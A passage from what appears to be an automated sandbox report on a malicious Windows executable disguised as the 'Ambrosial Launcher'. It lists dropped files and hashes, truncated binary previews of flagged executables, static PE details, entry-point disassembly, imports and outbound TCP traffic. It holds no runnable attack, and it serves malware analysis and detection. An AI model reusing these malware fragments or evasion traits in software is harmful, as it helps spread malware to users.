                                                                                                                                                                                      SSDEEP:196608:zkIxsIO2gfRMhSE8/Erd8QP+ih91q1odTAIRq+2vBQ:zkIuIO2gfRMYbcr6QP391qefB
                                                                                                                                                                                      MD5:E3635A875AA0817F0E29544AD9FF84B5
                                                                                                                                                                                      SHA1:FD65ADFD5BE0391790442DC1B4D21B7EE4BE271A
                                                                                                                                                                                      SHA-256:B9C94C4A6DCA1B5A42B05E4814838A9281768BA9267803A554C23B68C0665B0F
                                                                                                                                                                                      SHA-512:132EE0718115097A6B9AFC2368BF652D8B04207A6822A9A9E1900BC2921D3B8DE384A40EEC326E1662BFD7216B29CBE85CEEB8A7D49FE8ED293C4360B8115F0A
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Ambrosial.exe, Author: Joe Security
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....b............"...0.................. ....@...... .......................`............`...@......@............... ...............................@..8...........................t<..8............................................................ ..H............text........ ...................... ..`.rsrc...8....@....... ..............@..@........................................H.......h....w...........h...\...........................................(v...*n..}.....(......(.....(....*..0...........{....~!...o.....{....r...p(....r...p(....s....o....r...pr...po....o.....(......&....(....~'....?....~#...{S...9....r...p~'....X.....(....rK..p..@(.....3h~#....}S...~(...r...p(....(....&~(...r...p(....(....,.~(...r...p(....(....~(...r...p(....~#...ol...(....*.........PP.......0..*.......r...p"..$As.....~$...o.....8......(.....s.......o......(.@.@(....o.....o.....o..
                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\turbosquad_support417981.exe
                                                                                                                                                                                      Process:C:\Users\user\Desktop\Ambrosial.exe
                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1611208
                                                                                                                                                                                      Entropy (8bit):7.94723462921212
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:49152:V1/ZvnChCSyeZZjtIZLLVikrR03ROuUOTHujuK6W:j/ZvnCsBezKhLVFrR03ROuBTHuqK6
                                                                                                                                                                                      MD5:CB46AAC29D0C07833C3CD7395D373FCF
                                                                                                                                                                                      SHA1:84F37C1101BC4C3F4FC78378EC9DB1BCC1127477
                                                                                                                                                                                      SHA-256:4C0DCB6EDD7D4F3CBE1B84CF294D34EF7EE4F0435931DBB4F3E671B370583566
                                                                                                                                                                                      SHA-512:8947EB1163C8C68C246AB3B85B554A936D3F4B7C2241D5875B6D47B13F501515642F968C5E08BBC10720BA6737D701413FF774FE82CB0592F6CB4ABD3714C8A5
                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*(.$nI.wnI.wnI.wz".vcI.wz".v.I.wz".vxI.w<<.v.I.w<<.vzI.w<<.v$I.wz".vkI.wnI.w2I.w.<.voI.w.<.woI.w.<.voI.wRichnI.w........................PE..L...&.{a............................X06......@....@..........................@J.....i.....@.................................80..P....@..=............|.............................................................................................. R........................... ..` 6....0...................... ..` &....@...`...$..............@..@ .....0......................@... .h...P......................@..@ X...........................@..B.debug...............*..............@..@.B1uj23u.@.......@..................@....idata.......0.......n..............@....rsrc...=....@.......p..............@..@.B1uj23u.....P.......v..............`....boot........06......v..............`..`........
                                                                                                                                                                                      C:\Users\user\Desktop\Azonix.otf
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:OpenType font data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12076
                                                                                                                                                                                      Entropy (8bit):6.462991906631616
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:zQPfXgzu1L9C88GJOrwK9/yicW64NUIFrI2lhzDO/McIN0RRNas4XnRLKUMp3r7B:sXQ8C88hZcMpXDO/McINcNnUMFlj
                                                                                                                                                                                      MD5:CDFE47B31E9184A55CF02EEF1BAF7240
                                                                                                                                                                                      SHA1:B8825C605434D572F5277BE0283D5A9B2CDE59E4
                                                                                                                                                                                      SHA-256:51A65E5C09BF27980ADF640CB54CB2A5BBB217FDAAB79B377E158F92533362A9
                                                                                                                                                                                      SHA-512:A2E5141C0F7CA72BCF5B1A303FCE1734953D83AD363D4C3C7D8786E1BFD872A6B96EEABCE3740B547A5447E255415CDF688A0D2074CECFAA0C54C49D0F2882C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: OTTO.......@CFF {.1........+GPOSi.q.........GSUB...........0OS/2iY.....0...`cmap./.....P...Lhead..^........6hhea...F.......$hmtx...P........kern!.$....d...Pmaxp.jP....(....nameU.~/........post.......D... ........)..._.<........................I...................................................j..P..j.....x.......................1..............................XXXX.@.. ........1............... . .......V.........?.............?...........E...........L...........?........."._.....................Q...................................................................................~.#.................................&.......................D.........................?.................................$.........................3.........$.ECopyright 2018 Adobe Systems Incorporated. All rights reserved.AzonixRegular1.010;AzonixRegularVersion 1.010;Fontself Maker 3.0.1AzonixRegularPlease refer to the Copyright section for the font trademark attribution notices.mixofx.comMixo (mixofx)behance.net/
                                                                                                                                                                                      C:\Users\user\Desktop\OpenSansLight.ttf
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:TrueType Font data, digitally signed, 19 tables, 1st "DSIG", 30 names, Macintosh, Digitized data copyright \251 2010-2011, Google Corporation.Open Sans LightRegularAscender - Ope
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):222412
                                                                                                                                                                                      Entropy (8bit):6.431002788848856
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:b4kgACfHoUGMxLutgCNktQFvmnoxXTS4uUJt:z2fHowSqCNktA+SXfvJt
                                                                                                                                                                                      MD5:1BF71BE111189E76987A4BB9B3115CB7
                                                                                                                                                                                      SHA1:40442C189568184B6E6C27A25D69F14D91B65039
                                                                                                                                                                                      SHA-256:CF5F5184C1441A1660AA52526328E9D5C2793E77B6D8D3A3AD654BDB07AB8424
                                                                                                                                                                                      SHA-512:CB18B69E98A194AF5E3E3D982A75254F3A20BD94C68816A15F38870B9BE616CEF0C32033F253219CCA9146B2B419DD6DF28CC4CEEFF80D01F400AA0ED101E061
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ...........0DSIGHE....OX...tGDEF.&....K8....GPOS.7.7..KX...8GSUB.+=...K.....OS/2..Q.......`cmap)./h........cvt ............fpgm~a..........gasp...#..K(....glyf..zU..%...B.head.;....<...6hhea...$...t...$hmtx>.L ........kernT+.~..h....6loca=Z....l...Vmaxp.j......... name ........-post.C.l..$...&+prep..].......:..........f._.<..........B........K........b...........................................................X......./.\...5...........,.......3.......3.....f..................@. [...(....1ASC... ...........X ........?..... ...........................+.7.....u.q...{.....-.R.-.=.h.h...o...D...\...........s.......q...^...+...........m...y...o.......L...o...o...o.^.9...q.................j...............o.Z...H.................................\.o.1...........#.3.N...9.....R...........3...X.J.......=.b.......w...w.d.w.f.../.-...............................w.......w.......T...................7.......R...=.T.....H...o...............N.......+.T...!.....P...d...N.u.R...o...\...d.....m.....o
                                                                                                                                                                                      C:\Users\user\Desktop\YuGothL.ttc
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:TrueType font collection data, 2.0, 2 fonts, digitally signed, at 0x20 TrueType Font data, 21 tables, 1st "BASE"
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13823480
                                                                                                                                                                                      Entropy (8bit):6.765551859398356
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:98304:v/HABP5Qh1EFlpgCKdRARefH8hShPW8/N+kWXdX4fen65DYRIQPd521LFpriuihB:vIO2gfRMhSE8/Erd8QP+ih91qc
                                                                                                                                                                                      MD5:0FD31D088DE3A9062313BBE326E2B0F8
                                                                                                                                                                                      SHA1:9691C2A7714878A75FE2171BB482C032BA55D2F4
                                                                                                                                                                                      SHA-256:536A19FA3E895EC798DA3ADBBEB6EA5A061230AC6A3B1B89BF4424F71D844303
                                                                                                                                                                                      SHA-512:BE700EE2122FC6E535743AE719C9A726CD6082DBF771AE56AE0BA21FBD078F1741334BF0762208CB96E434124E7E7562FB1AB7C78C2F47B3628A5C0C20150236
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ttcf........... ...|DSIG.."X..............PBASE.. .........GDEF.&_M........GPOS............GSUB.yFw......E~OS/2I..W..X4...`cmap.....X.....cvt _.&...N.....fpgm..I...Sh....gasp......a.....glyf..?...b....,head..A...a0...6hhea.Bd\..ah...$hmtx.0....a...},locaJ........}0maxpdz.X..[.... meta..W...\....fname..$..\p....post.6.h..cT... prep..Wv..ct...Cvhea..`...h....$vmtx.m....h...u^...........`BASE.. .........GDEF.&_M........GPOS......<...:GSUB}i...x....OS/2D......@...`VDMXvX}........cmap.........cvt _.&...N.....fpgm..I...Sh....gasp......a.....glyf..?...b....,head..Ar...h...6hhea..d!......$hmtx.0....a...},locaJ........}0maxpdz.X..[.... meta..W...\....fname~.7........post.6.h..cT... prep..Wv..ct...Cvhea..`...h....$vmtx.m....h...u^.......D......icfbicftideoromn..DFLT.bcyrl.hgrek.hhani.bkana.blatn.h......icfbicftideoromn..DFLT.2cyrl.8grek.8hani.2kana.2latn.8.............$.....*.........0.4.8.<.....$.(.,.0.....(.,.$.0....... ...$...q...............f.........................._G........
                                                                                                                                                                                      C:\Windows\Fonts\Azonix.otf
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:OpenType font data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12076
                                                                                                                                                                                      Entropy (8bit):6.462991906631616
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:zQPfXgzu1L9C88GJOrwK9/yicW64NUIFrI2lhzDO/McIN0RRNas4XnRLKUMp3r7B:sXQ8C88hZcMpXDO/McINcNnUMFlj
                                                                                                                                                                                      MD5:CDFE47B31E9184A55CF02EEF1BAF7240
                                                                                                                                                                                      SHA1:B8825C605434D572F5277BE0283D5A9B2CDE59E4
                                                                                                                                                                                      SHA-256:51A65E5C09BF27980ADF640CB54CB2A5BBB217FDAAB79B377E158F92533362A9
                                                                                                                                                                                      SHA-512:A2E5141C0F7CA72BCF5B1A303FCE1734953D83AD363D4C3C7D8786E1BFD872A6B96EEABCE3740B547A5447E255415CDF688A0D2074CECFAA0C54C49D0F2882C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: OTTO.......@CFF {.1........+GPOSi.q.........GSUB...........0OS/2iY.....0...`cmap./.....P...Lhead..^........6hhea...F.......$hmtx...P........kern!.$....d...Pmaxp.jP....(....nameU.~/........post.......D... ........)..._.<........................I...................................................j..P..j.....x.......................1..............................XXXX.@.. ........1............... . .......V.........?.............?...........E...........L...........?........."._.....................Q...................................................................................~.#.................................&.......................D.........................?.................................$.........................3.........$.ECopyright 2018 Adobe Systems Incorporated. All rights reserved.AzonixRegular1.010;AzonixRegularVersion 1.010;Fontself Maker 3.0.1AzonixRegularPlease refer to the Copyright section for the font trademark attribution notices.mixofx.comMixo (mixofx)behance.net/
                                                                                                                                                                                      C:\Windows\Fonts\OpenSansLight.ttf
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:TrueType Font data, digitally signed, 19 tables, 1st "DSIG", 30 names, Macintosh, Digitized data copyright \251 2010-2011, Google Corporation.Open Sans LightRegularAscender - Ope
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):222412
                                                                                                                                                                                      Entropy (8bit):6.431002788848856
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:b4kgACfHoUGMxLutgCNktQFvmnoxXTS4uUJt:z2fHowSqCNktA+SXfvJt
                                                                                                                                                                                      MD5:1BF71BE111189E76987A4BB9B3115CB7
                                                                                                                                                                                      SHA1:40442C189568184B6E6C27A25D69F14D91B65039
                                                                                                                                                                                      SHA-256:CF5F5184C1441A1660AA52526328E9D5C2793E77B6D8D3A3AD654BDB07AB8424
                                                                                                                                                                                      SHA-512:CB18B69E98A194AF5E3E3D982A75254F3A20BD94C68816A15F38870B9BE616CEF0C32033F253219CCA9146B2B419DD6DF28CC4CEEFF80D01F400AA0ED101E061
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: ...........0DSIGHE....OX...tGDEF.&....K8....GPOS.7.7..KX...8GSUB.+=...K.....OS/2..Q.......`cmap)./h........cvt ............fpgm~a..........gasp...#..K(....glyf..zU..%...B.head.;....<...6hhea...$...t...$hmtx>.L ........kernT+.~..h....6loca=Z....l...Vmaxp.j......... name ........-post.C.l..$...&+prep..].......:..........f._.<..........B........K........b...........................................................X......./.\...5...........,.......3.......3.....f..................@. [...(....1ASC... ...........X ........?..... ...........................+.7.....u.q...{.....-.R.-.=.h.h...o...D...\...........s.......q...^...+...........m...y...o.......L...o...o...o.^.9...q.................j...............o.Z...H.................................\.o.1...........#.3.N...9.....R...........3...X.J.......=.b.......w...w.d.w.f.../.-...............................w.......w.......T...................7.......R...=.T.....H...o...............N.......+.T...!.....P...d...N.u.R...o...\...d.....m.....o
                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1572864
                                                                                                                                                                                      Entropy (8bit):4.277565071576314
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12288:88TXc+MS5V9H9iJA9dm/S1vmtaluTZQaBex6zNlbcU2G3OR072kHB:zTXc+MS5V9H9iJCC
                                                                                                                                                                                      MD5:87252DF43F6B6AB013EC1A0D068A5C8F
                                                                                                                                                                                      SHA1:5B13AA3FAD9F59EA33DD96BC700ECCADD942B500
                                                                                                                                                                                      SHA-256:3EEDA5E760AE5DEF571B4D3BA033CE2E1F7AF64072105EB44ABECB398FF230D9
                                                                                                                                                                                      SHA-512:BA59663147A36B8F7E4CCA2414C789F036185C364892097F3F16172C6CEE9F1C50D94226D5A08F5274756B6A02C5A8106ABAF3026AA23E7D4D6576F9837E1BC2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm~.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24576
                                                                                                                                                                                      Entropy (8bit):4.040455729125419
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:RbxQn5Rftx1RPJ4X6sFEn37kmPBqXhSeq5QMVyiy+/0l4Lk4bZd1DoXznyvSyJyA:nQ5Rftx1xJ4XvFE37TBqXoeq5QMVyiyX
                                                                                                                                                                                      MD5:1E90010CA3B86C7488EC1703EFB86045
                                                                                                                                                                                      SHA1:CA5B575D1EEB268CBC3FE8FE8ABD78751D9B194F
                                                                                                                                                                                      SHA-256:A07F92C3DD51285AF1366566D1F860F499F879A30F627A0C6CFF86F66226033B
                                                                                                                                                                                      SHA-512:3A08F7E30C62D22477F5733372C67B58EA4122F637E05B82A134515D6E461C505D0730BA2F69CDCD9E05DE233390ADF036EC5BE81452695DA5690E6C9F660263
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm~......................................................................................................................................................................................................................................................................................................................................................HvLE.^......Y............&0..H..dk..a.+.........0................... ..hbin................p.\..,..........nk,.)\.......... ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .)\.......... ........................... .......Z.......................Root........lf......Root....nk .)\.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                                                                                                                                                      Static File Info

                                                                                                                                                                                      General

                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Entropy (8bit):6.245411681135202
                                                                                                                                                                                      TrID:
                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                      File name:Ambrosial.exe
                                                                                                                                                                                      File size:27613184
                                                                                                                                                                                      MD5:3480891869269773f85cf1cb389bbf96
                                                                                                                                                                                      SHA1:6c08b67e2fb0f63788ad2fd7f74ba160eb507175
                                                                                                                                                                                      SHA256:1fd73d2549cb9a36d4a27fd7ed6f9ba7aa0ff0e1103b4b96821de901152b118e
                                                                                                                                                                                      SHA512:d8e83f76e1e0134716dbfb0e827a1a04722a7d194295f8d6672b8b996161256d6c94f11d3d67390455b645d0d48dc1ad3c403f512032b2eb9b65e34f9a8e174f
                                                                                                                                                                                      SSDEEP:786432:pWOVL6SHzGGX7iRCD5AhAhApknRi0gum:PjHNga
                                                                                                                                                                                      File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....t|a...............I.L...................`....@..................................p.....................................

                                                                                                                                                                                      File Icon

                                                                                                                                                                                      Icon Hash:c58991b2e96c543a

                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                      General

                                                                                                                                                                                      Entrypoint:0x401000
                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                                      Time Stamp:0x617C74FB [Fri Oct 29 22:26:03 2021 UTC]
                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                      OS Version Major:1
                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                      File Version Major:1
                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                      Subsystem Version Major:1
                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                      Import Hash:140094f13383e9ae168c4b35b6af3356

                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                      Instruction
                                                                                                                                                                                      call 00007F21A25A4726h
                                                                                                                                                                                      push 00000000h
                                                                                                                                                                                      call dword ptr [01E260A4h]
                                                                                                                                                                                      ret
                                                                                                                                                                                      add al, 00h
                                                                                                                                                                                      lahf
                                                                                                                                                                                      add byte ptr [A200BBA8h], al
                                                                                                                                                                                      add byte ptr [ecx+00000C00h], dl
                                                                                                                                                                                      lds ebp, fword ptr [ebx+45h]
                                                                                                                                                                                      add byte ptr [esi+67E21B7Ah], al
                                                                                                                                                                                      add al, bl
                                                                                                                                                                                      add dl, al
                                                                                                                                                                                      add dl, al
                                                                                                                                                                                      add byte ptr [eax+eax-15h], dh
                                                                                                                                                                                      add byte ptr [esi+496B0079h], ah
                                                                                                                                                                                      rol byte ptr [eax], cl
                                                                                                                                                                                      add al, C6h
                                                                                                                                                                                      sbb eax, 80009CC3h
                                                                                                                                                                                      add byte ptr [eax], dl
                                                                                                                                                                                      add byte ptr [ecx+ebx*2], bh
                                                                                                                                                                                      and al, 00h
                                                                                                                                                                                      fadd dword ptr [eax]
                                                                                                                                                                                      popad
                                                                                                                                                                                      add byte ptr [ebx], dh
                                                                                                                                                                                      add byte ptr [edi-26h], dl
                                                                                                                                                                                      shl byte ptr [eax+eax+437B8029h], 1
                                                                                                                                                                                      add byte ptr [ebx+00h], dh
                                                                                                                                                                                      dec ecx
                                                                                                                                                                                      add byte ptr [eax+3D00C900h], ah
                                                                                                                                                                                      add ch, dh
                                                                                                                                                                                      xchg eax, esp
                                                                                                                                                                                      add byte ptr [eax+42h], cl
                                                                                                                                                                                      fadd dword ptr [eax]
                                                                                                                                                                                      inc esp
                                                                                                                                                                                      sbb al, D8h
                                                                                                                                                                                      std
                                                                                                                                                                                      add byte ptr [ecx+00h], al
                                                                                                                                                                                      pop eax
                                                                                                                                                                                      add byte ptr [eax+edx], ah
                                                                                                                                                                                      jne 00007F21A0B80CA2h
                                                                                                                                                                                      jnp 00007F21A0B80CA2h
                                                                                                                                                                                      cdq
                                                                                                                                                                                      add byte ptr [eax+00h], ch
                                                                                                                                                                                      and edi, dword ptr [ecx+03h]
                                                                                                                                                                                      pop edi
                                                                                                                                                                                      add byte ptr [edx-45h], dl
                                                                                                                                                                                      sti
                                                                                                                                                                                      lodsd
                                                                                                                                                                                      inc dword ptr [eax]
                                                                                                                                                                                      out 00h, eax
                                                                                                                                                                                      cmpsd
                                                                                                                                                                                      add ah, bh
                                                                                                                                                                                      add byte ptr [edi+1500F500h], ah
                                                                                                                                                                                      insb
                                                                                                                                                                                      add bh, ch
                                                                                                                                                                                      outsd
                                                                                                                                                                                      adc dword ptr [eax], eax
                                                                                                                                                                                      lodsb
                                                                                                                                                                                      adc esp, dword ptr [esi]
                                                                                                                                                                                      imul ebp, dword ptr [ebx], 80000100h
                                                                                                                                                                                      add byte ptr [edi], ch
                                                                                                                                                                                      dec ecx
                                                                                                                                                                                      add byte ptr [ebx+00h], dl
                                                                                                                                                                                      mov dword ptr [eax], 0B4700AAh
                                                                                                                                                                                      out 1Fh, al
                                                                                                                                                                                      add cl, bh
                                                                                                                                                                                      popad
                                                                                                                                                                                      or byte ptr [edx-16h], bh
                                                                                                                                                                                      add byte ptr [ecx+4F000C00h], dl
                                                                                                                                                                                      add byte ptr [ebx+00h], cl
                                                                                                                                                                                      int1
                                                                                                                                                                                      add byte ptr [eax-6007FF6Ch], cl
                                                                                                                                                                                      inc edx

                                                                                                                                                                                      Data Directories

                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1a260000x1fc.idata
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a270000x30758.rsrc
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                      Sections

                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                      .text0x10000x1a24bc80x1a24c00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .idata0x1a260000x1fc0x200False0.5234375data4.36112739477IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                      .rsrc0x1a270000x307580x30800False0.782689674613data7.37769428743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                      Resources

                                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                                      RT_ICON0x1a271a00x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                                      RT_ICON0x1a276180x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4283649414, next used block 4283846793
                                                                                                                                                                                      RT_ICON0x1a286d00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4283979148, next used block 4283453059
                                                                                                                                                                                      RT_ICON0x1a2ac880x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4281940070, next used block 4281611103
                                                                                                                                                                                      RT_ICON0x1a2eec00x10828data
                                                                                                                                                                                      RT_ICON0x1a3f6f80x17ab8PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      RT_GROUP_ICON0x1a571c00x5adata
                                                                                                                                                                                      RT_VERSION0x1a5722c0x25cdata
                                                                                                                                                                                      RT_MANIFEST0x1a574980x2bdXML 1.0 document, ASCII text, with CRLF line terminators

                                                                                                                                                                                      Imports

                                                                                                                                                                                      DLLImport
                                                                                                                                                                                      kernel32.dllCreateThread, ExitProcess, GetComputerNameA, GetModuleFileNameA, GetModuleHandleW, GetProcAddress, SetErrorMode, Sleep, VirtualAllocExNuma
                                                                                                                                                                                      Shlwapi.dllPathFindFileNameA
                                                                                                                                                                                      msvcrt.dllmalloc, free, memset, strcmp, _strcmpi, strcpy

                                                                                                                                                                                      Version Infos

                                                                                                                                                                                      DescriptionData
                                                                                                                                                                                      LegalCopyrightCopyright Atani 2021
                                                                                                                                                                                      FileVersion1.0.0.0
                                                                                                                                                                                      ProductNameAmbrosial
                                                                                                                                                                                      ProductVersion1.0.0.0
                                                                                                                                                                                      FileDescriptionAmbrosial Launcher
                                                                                                                                                                                      OriginalFilenameAmbrosial.exe
                                                                                                                                                                                      Translation0x0409 0x0000

                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                      Oct 30, 2021 13:51:36.008220911 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.008277893 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.009829044 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.289001942 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.289057970 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.340338945 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.340886116 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.346034050 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.346044064 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.346287012 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.395592928 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.762135029 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.804924965 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920099020 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920176029 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920233965 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920277119 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920324087 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920361996 CEST44349741185.199.108.133192.168.2.3
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920368910 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920387030 CEST49741443192.168.2.3185.199.108.133
                                                                                                                                                                                      Oct 30, 2021 13:51:36.920417070 CEST44349741185.199.108.133192.168.2.3
